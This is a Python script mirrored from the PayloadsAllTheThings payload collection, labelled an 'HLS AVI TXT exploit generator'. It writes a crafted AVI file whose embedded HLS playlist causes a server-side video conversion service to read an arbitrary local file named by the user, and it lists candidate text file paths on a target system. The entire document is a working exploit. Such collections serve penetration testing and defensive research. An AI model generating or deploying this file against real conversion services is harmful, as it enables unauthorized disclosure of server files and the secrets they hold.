mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-01 17:15:27 +00:00
39 lines
2.0 KiB
Python
39 lines
2.0 KiB
Python
|
import struct
|
||
|
import argparse
|
||
|
|
||
|
AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi"
|
||
|
|
||
|
|
||
|
def make_txt_packet(content, fake_packets=50, fake_packet_len=200):
|
||
|
content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content
|
||
|
packet = b'00tx' + struct.pack('<I', len(content)) + content
|
||
|
dcpkt = b'00dc' + struct.pack('<I', fake_packet_len) + b'\x00' * fake_packet_len
|
||
|
return packet + dcpkt * fake_packets
|
||
|
|
||
|
TXT_PLAYLIST = """#EXTM3U
|
||
|
#EXT-X-MEDIA-SEQUENCE:0
|
||
|
#EXTINF:1.0,
|
||
|
#EXT-X-BYTERANGE: 0
|
||
|
{txt}
|
||
|
#EXTINF:1.0,
|
||
|
{file}
|
||
|
#EXT-X-ENDLIST"""
|
||
|
|
||
|
def prepare_txt_packet(txt, filename):
|
||
|
return make_txt_packet(TXT_PLAYLIST.format(txt=txt, file=filename).encode())
|
||
|
|
||
|
# TXT_LIST = ['/usr/share/doc/gnupg/Upgrading_From_PGP.txt', '/usr/share/doc/mount/mount.txt', '/etc/pki/nssdb/pkcs11.txt', '/usr/share/gnupg/help.txt']
|
||
|
|
||
|
if __name__ == "__main__":
|
||
|
parser = argparse.ArgumentParser('HLS AVI TXT exploit generator')
|
||
|
parser.add_argument('filename', help='file that should be read from convertion instance')
|
||
|
parser.add_argument('output_avi', help='where to save the avi')
|
||
|
parser.add_argument('--txt', help='any .txt file that exist on target system', default='GOD.txt')
|
||
|
args = parser.parse_args()
|
||
|
avi = AVI_HEADER + prepare_txt_packet(args.txt, args.filename)
|
||
|
output_name = args.output_avi
|
||
|
|
||
|
with open(output_name, 'wb') as f:
|
||
|
f.write(avi)
|
||
|
|